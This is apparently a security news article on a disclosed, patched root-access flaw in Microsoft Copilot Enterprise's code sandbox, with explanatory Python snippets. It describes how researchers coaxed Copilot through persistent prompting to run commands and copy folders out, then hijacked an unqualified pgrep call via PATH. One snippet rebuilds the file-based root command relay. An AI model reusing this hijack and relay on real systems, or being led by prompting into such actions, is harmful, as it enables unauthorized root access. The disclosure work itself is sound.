A critical security vulnerability has been discovered in Microsoft Copilot Enterprise that allowed unauthorized users to gain root access to its backend container.

The vulnerability posed a significant risk, potentially allowing malicious users to manipulate system settings, access sensitive data, and compromise the application's integrity.

The issue originated in an April 2025 update that introduced a live Python sandbox powered by Jupyter Notebook, designed to execute code seamlessly. What began as a feature enhancement turned into a playground for exploitation, highlighting the risks in AI-integrated systems.

The vulnerability was uncovered by Eye Security, whose researchers playfully likened interacting with Copilot to coaxing an unpredictable child. Using Jupyter's %command syntax, they executed arbitrary Linux commands as the 'ubuntu' user inside a miniconda environment.

Although the user belonged to the sudo group, no sudo binary existed, an ironic twist in the setup. The sandbox closely resembled ChatGPT's but ran a newer kernel and Python 3.12, compared with ChatGPT's Python 3.11 at the time.

Further exploration showed that the sandbox's main job was running Jupyter Notebooks alongside a Tika server. The container had a restricted link-local network interface with a /32 netmask and used an OverlayFS filesystem linked to a /legion path on the host.
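A /32 netmask leaves exactly one address in the interface's subnet, its own, so there are no on-link neighbors to reach. Python's standard ipaddress module makes that concrete. The address below is a hypothetical link-local example; the article does not give the container's real one.

```python
import ipaddress

# Hypothetical address: the article only says the interface was link-local with a /32 mask.
iface = ipaddress.ip_interface("169.254.0.2/32")


def describe(interface: ipaddress.IPv4Interface) -> dict:
    """Summarize how much of its own subnet an interface can see."""
    net = interface.network
    return {
        "link_local": interface.ip.is_link_local,  # inside 169.254.0.0/16
        "prefix_len": net.prefixlen,
        "addresses_in_subnet": net.num_addresses,  # a /32 holds only the interface itself
    }


print(describe(iface))  # {'link_local': True, 'prefix_len': 32, 'addresses_in_subnet': 1}
```

For comparison, the same address with a /24 mask would share its subnet with 256 addresses.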

Custom scripts lived in the /app directory, and with persistent prompting, Copilot could be convinced to download files or tar entire folders, copying them to /mnt/data, from where they could be retrieved externally via blob links on outlook.office[.]com.
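Archiving a folder and dropping the result somewhere it can be fetched is a one-function job with Python's standard tarfile module. This is a generic sketch of that step, not what Copilot actually ran; the function name tar_to_outbox is hypothetical, and the outbox parameter stands in for /mnt/data.

```python
import tarfile
from pathlib import Path


def tar_to_outbox(src_dir: str, outbox: str) -> Path:
    """Pack src_dir into a gzipped tarball inside outbox and return the tarball's path.

    Hypothetical helper: in the article's scenario, outbox would be /mnt/data.
    """
    src = Path(src_dir)
    dest = Path(outbox) / f"{src.name}.tar.gz"
    dest.parent.mkdir(parents=True, exist_ok=True)
    with tarfile.open(dest, "w:gz") as tar:
        # arcname keeps archive paths relative to the folder's own name (e.g. "app/...")
        tar.add(str(src), arcname=src.name)
    return dest
```

For example, `tar_to_outbox("/app", "/mnt/data")` would write `/mnt/data/app.tar.gz`.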

A key binary, goclientapp in /app, served as the container's interface, running a web server on port 6000 that accepted POST requests to an /execute endpoint.

Simple JSON payloads such as {"code":"%env"} triggered code execution in the Jupyter environment. An httpproxy binary hinted at future outbound traffic capabilities, although egress was disabled.
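The request shape described above can be sketched with Python's standard library. Only the port (6000), the path (/execute) and the {"code": ...} payload come from the article; the host is a placeholder and the Content-Type header is an assumption, since the article does not say what goclientapp expected.

```python
import json
import urllib.request


def build_execute_request(host: str, code: str, port: int = 6000) -> urllib.request.Request:
    """Build (without sending) a JSON POST to an /execute endpoint.

    `host` is a placeholder and the Content-Type header is an assumption.
    """
    body = json.dumps({"code": code}).encode("utf-8")
    return urllib.request.Request(
        f"http://{host}:{port}/execute",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


req = build_execute_request("127.0.0.1", "%env")
print(req.get_method(), req.full_url)  # POST http://127.0.0.1:6000/execute
print(req.data)                        # b'{"code": "%env"}'
```

Passing `req` to `urllib.request.urlopen` would actually send it; the sketch stops at building the request, since there is no such endpoint to test against outside the container.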



The entrypoint.sh script, which ran as root, proved pivotal. It dropped privileges for most processes but launched keepAliveJupyterSvc.sh as root. A critical oversight on line 28 was a pgrep call without a full path, executed in a 'while true' loop every two seconds.

The call therefore relied on the $PATH variable, which listed writable directories such as /app/miniconda/bin before /usr/bin, where the legitimate pgrep resides.
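The lookup rule at the heart of the bug can be reproduced with Python's standard `shutil.which`, which searches a PATH-style string left to right and returns the first executable match, just as a shell does for an unqualified command. This is a minimal, POSIX-only sketch: the two temporary directories are hypothetical stand-ins for /app/miniconda/bin and /usr/bin, and the planted files are trivial scripts rather than the researchers' payload.

```python
import os
import shutil
import stat
import tempfile
from pathlib import Path
from typing import Optional, Sequence, Tuple


def make_fake_tool(directory: Path, name: str) -> Path:
    """Create a trivial executable shell script called `name` in `directory`."""
    path = directory / name
    path.write_text("#!/bin/sh\nexit 0\n")
    path.chmod(path.stat().st_mode | stat.S_IXUSR)
    return path


def resolve(name: str, search_dirs: Sequence[Path]) -> Optional[str]:
    """Resolve `name` like an unqualified command: first executable match wins."""
    return shutil.which(name, path=os.pathsep.join(str(d) for d in search_dirs))


def demo() -> Tuple[bool, bool]:
    """Return (hijacked, hardened): whether each lookup found the expected file."""
    with tempfile.TemporaryDirectory() as tmp:
        writable = Path(tmp, "miniconda_bin")  # stand-in for /app/miniconda/bin
        system = Path(tmp, "usr_bin")          # stand-in for /usr/bin
        writable.mkdir()
        system.mkdir()
        legit = make_fake_tool(system, "pgrep")
        impostor = make_fake_tool(writable, "pgrep")

        # Vulnerable order: the writable directory is searched before the system one.
        hijacked = resolve("pgrep", [writable, system]) == str(impostor)
        # Hardened: only the trusted directory is searched.
        hardened = resolve("pgrep", [system]) == str(legit)
        return hijacked, hardened


print(demo())
```

Both flags come out True when lookup behaves as described: the impostor wins under the vulnerable order, and the legitimate binary wins once the writable directory is gone. That second case mirrors the usual fixes for this class of bug, namely calling /usr/bin/pgrep by absolute path in a root script or setting a fixed PATH with no user-writable directories before running it.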

Exploiting this, the researchers crafted a malicious Python script named pgrep and placed it in the writable directory. Uploaded via Copilot, it read commands from /mnt/data/in, executed them with popen, and wrote the output to /mnt/data/out.
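The file-based command channel described above can be sketched as a single polling pass. This is an illustrative reconstruction, not the researchers' script: the function name `relay_once` is hypothetical, the inbox and outbox paths are parameters (the article used /mnt/data/in and /mnt/data/out), and where the article says the script used popen, this version uses `subprocess.run`, which is built on `subprocess.Popen`, so that stdout and stderr can both be captured.

```python
import subprocess
from pathlib import Path


def relay_once(inbox: Path, outbox: Path) -> bool:
    """Run the command found in `inbox` (if any) and write its output to `outbox`.

    Hypothetical helper. Returns True if a command was processed.
    """
    if not inbox.exists():
        return False
    command = inbox.read_text().strip()
    inbox.unlink()  # consume the request so the next pass does not re-run it
    if not command:
        return False
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    outbox.write_text(result.stdout + result.stderr)
    return True
```

Because keepAliveJupyterSvc.sh invoked "pgrep" every two seconds, one pass per invocation would be enough: the hijacked loop supplies the polling, and whatever the pass runs inherits that loop's root privileges.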

This granted root access and allowed the researchers to explore the filesystem, although they found no sensitive data or container breakout paths, as known vulnerabilities had been patched.

Eye Security reported the issue to the Microsoft Security Response Center (MSRC) on April 18, 2025. The vulnerability was fixed by July 25 and classified as moderate severity. No bounty was awarded, only an acknowledgment on Microsoft's researcher page.



The researchers noted that the exploit yielded "absolutely nothing" beyond fun, but teased further discoveries, including access to the Responsible AI Operations panel for Copilot and 21 internal services through Entra OAuth abuse.

The incident underscores the double-edged nature of AI sandboxes: innovative, yet vulnerable to creative attacks. Microsoft has not publicly commented, but the fix reflects proactive security work in a fast-evolving AI landscape.
